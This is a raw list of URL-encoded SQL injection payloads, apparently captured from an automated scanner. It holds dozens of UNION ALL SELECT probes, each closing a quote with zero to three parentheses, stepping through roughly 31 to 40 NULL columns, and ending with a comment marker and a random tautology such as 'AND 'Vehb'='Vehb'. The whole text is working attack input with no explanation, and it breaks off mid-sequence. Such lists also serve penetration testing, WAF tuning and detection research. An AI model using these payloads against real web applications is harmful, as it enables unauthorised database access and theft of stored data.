1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Vehb%27%3D%27Vehb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27GNQY%27%3D%27GNQY 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27vJgp%27%3D%27vJgp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27cari%27%3D%27cari 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27bhcB%27%3D%27bhcB 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Cntk%27%3D%27Cntk 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27KltX%27%3D%27KltX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27SAJT%27%3D%27SAJT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27AJbB%27%3D%27AJbB 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27idjs%27%3D%27idjs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27gyJP%27%3D%27gyJP 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27wBIR%27%3D%27wBIR 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27FLlv%27%3D%27FLlv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ocjF%27%3D%27ocjF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27aUVz%27%3D%27aUVz 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27QfoZ%27%3D%27QfoZ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27IIHB%27%3D%27IIHB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27oWYx%27%3D%27oWYx 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27coWS%27%3D%27coWS 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27EkMH%27%3D%27EkMH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27rqmK%27%3D%27rqmK 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27fFHv%27%3D%27fFHv 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27RRyf%27%3D%27RRyf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27Yufo%27%3D%27Yufo 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27IvnP%27%3D%27IvnP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XvTM%27%3D%27XvTM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XrmO%27%3D%27XrmO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27AxaF%27%3D%27AxaF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27xBeF%27%3D%27xBeF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27KgzI%27%3D%27KgzI 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27yJQg%27%3D%27yJQg 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27QyoN%27%3D%27QyoN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27UmBy%27%3D%27UmBy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vGKK%27%3D%27vGKK 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27rSyo%27%3D%27rSyo 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27BgLV%27%3D%27BgLV 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vyYs%27%3D%27vyYs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27nvlw%27%3D%27nvlw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xoOY%27%3D%27xoOY 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27yQSW%27%3D%27yQSW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27XYkR%27%20LIKE%20%27XYkR 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27xuvb%27%20LIKE%20%27xuvb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27BNdi%27%20LIKE%20%27BNdi 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27PGqR%27%20LIKE%20%27PGqR 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27WoFo%27%20LIKE%20%27WoFo 